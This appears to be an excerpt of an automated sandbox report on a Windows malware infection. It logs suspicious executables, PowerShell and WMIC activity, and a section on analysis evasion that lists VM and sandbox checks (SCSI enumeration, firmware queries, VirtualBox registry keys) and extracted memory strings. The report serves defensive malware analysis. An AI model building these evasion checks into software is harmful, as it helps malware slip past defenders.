                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00408761
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Checks if the current machine is a virtual machine (disk enumeration)
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Query firmware table information (likely to detect VMs)
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeSystem information queried: FirmwareTableInformation
                        Tries to detect sandboxes / dynamic malware analysis system (registry check)
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
